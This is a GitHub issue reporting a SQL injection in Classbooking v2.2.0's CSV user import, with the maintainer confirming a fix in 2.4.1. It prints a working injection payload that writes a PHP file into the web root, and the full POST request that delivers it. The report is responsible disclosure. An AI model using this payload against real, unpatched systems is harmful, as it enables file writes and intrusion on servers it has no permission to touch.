Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Classbooking v2.2.0 has SQL injection #27

Closed
hakuQAQ opened this issue Dec 8, 2020 · 2 comments
Closed

Classbooking v2.2.0 has SQL injection #27

hakuQAQ opened this issue Dec 8, 2020 · 2 comments
Assignees
Labels

Comments

@hakuQAQ
Copy link

hakuQAQ commented Dec 8, 2020

After the administrator logs in, when adding a new user, choose to import the csv file, and there is SQL injection in the csv file username.

image

The csv file is as follows:
test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, 123@qwe.com, test1234

If mysql has writable permissions,this csv file will create a new phpinfo file in the website directory.

the POST file is:

POST /hcms/index.php/users/import HTTP/1.1
Host: 192.168.31.120
Content-Length: 825
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.120
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzClKDALsrTEKS6TB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.120/hcms/index.php/users/import
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: crbs=tr55skb4jdshkp7vcpb7q4i0pbd2te46
Connection: close

------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="action"

import
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="userfile"; filename="1.csv"
Content-Type: application/vnd.ms-excel

test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, 123@qwe.com, test1234
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="authlevel"

2
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="enabled"

0
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="enabled"

1
------WebKitFormBoundaryzClKDALsrTEKS6TB--

image

image

@craigrodway
Copy link
Owner

Hi hakuQAQ, thanks very much for reporting this issue.

I haven't had chance to fully investigate yet but it does seem possible and needs fixing. A new version will be released shortly to address this.

@craigrodway
Copy link
Owner

Thanks again for reporting this; it has now been fixed in the latest release, 2.4.1.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants